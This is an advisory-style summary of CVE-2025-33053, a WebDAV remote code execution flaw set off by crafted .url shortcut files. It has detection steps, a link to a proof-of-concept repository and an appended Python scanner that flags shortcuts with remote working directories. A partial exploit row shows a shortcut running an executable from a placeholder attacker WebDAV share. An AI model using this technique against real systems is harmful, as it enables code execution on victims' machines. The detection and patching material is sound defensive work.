CVE-2025-33053 | WEBDAV | RCE
| Vulnerability | CVE-2025-33053 |
|---|---|
| Type | Remote code execution vulnerability in the WebDAV service |
| Description | CVE-2025-33053 is a vulnerability within the WebDAV service that allows attackers to execute arbitrary code remotely through the manipulation of the working directory. |
| The Impact of the Bug | The primary impact of CVE-2025-33053 is remote code execution once the user opens a manipulated .url file, which can simply launch any legitimate executable but with the threat actor's working directory, which could be a remote WebDAV URL. |
| Exploitation PoC | The following is an example of a .url file to exploit this vulnerability: `[InternetShortcut]` Once the user opens the shortcut file, it will automatically execute the file `\\[Attacker WEBDAV path]\route.exe` instead of the local legitimate route.exe under `\windows\system32\`. |
| How to detect if you are vulnerable to this attack vector? | 1. Identify Windows version: verify that you have the patched Windows version released on Jun 10, 2025 (affected versions include Windows 10/11 and Windows Server 2008, 2012, 2016, 2022, 2025). 2. Check for patch installation: use the Microsoft Security Update Guide for CVE-2025-33053 to confirm that the system has the relevant security updates installed. 3. Test for vulnerability: use available Proof-of-Concept (PoC) tools from the following repositories: https://github.com/havij13/CVE-2025-33053-WebDAV-0-Day-RCE |
| References | - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053 - https://nvd.nist.gov/vuln/detail/CVE-2025-33053 - https://research.checkpoint.com/2025/stealth-falcon-zero-day/ |
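
A defensive check for the pattern the table describes, as an added example that is not part of the original page: it parses .url files and flags any whose `WorkingDirectory` field points to a UNC/WebDAV or HTTP location instead of a local folder. The host `webdav.example.test`, the file name `example.exe` and both sample shortcuts are constructed for illustration.

```python
import re
from pathlib import Path

# Remote forms a working directory can take: UNC (\\host\share or //host/share),
# which covers WebDAV redirector paths such as \\host@SSL\DavWWWRoot\..., or http(s).
REMOTE_DIR = re.compile(r'^(\\\\|//|https?://)', re.IGNORECASE)

# Constructed samples: same launch target, local vs. remote working directory.
LOCAL = r"""[InternetShortcut]
URL=C:\Windows\System32\example.exe
WorkingDirectory=C:\Users\Public
"""
SUSPECT = r"""[InternetShortcut]
URL=C:\Windows\System32\example.exe
WorkingDirectory=\\webdav.example.test@SSL\DavWWWRoot\share
"""

def parse_url_shortcut(text):
    """Return the [InternetShortcut] keys of a .url file as a lowercase-keyed dict."""
    fields, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip().strip('"')
    return fields

def remote_working_directory(text):
    """Return the WorkingDirectory value if it points off-host, else None."""
    workdir = parse_url_shortcut(text).get("workingdirectory", "")
    return workdir if REMOTE_DIR.match(workdir) else None

def scan_tree(root):
    """Yield (path, working_directory) for every flagged .url file under root."""
    for path in Path(root).rglob("*.url"):
        try:
            text = path.read_text(encoding="utf-8-sig", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        hit = remote_working_directory(text)
        if hit:
            yield path, hit
```

Run `scan_tree` over download folders, mail attachment caches and user profiles; a hit is a triage lead regardless of patch status, since a legitimate shortcut rarely needs a remote working directory.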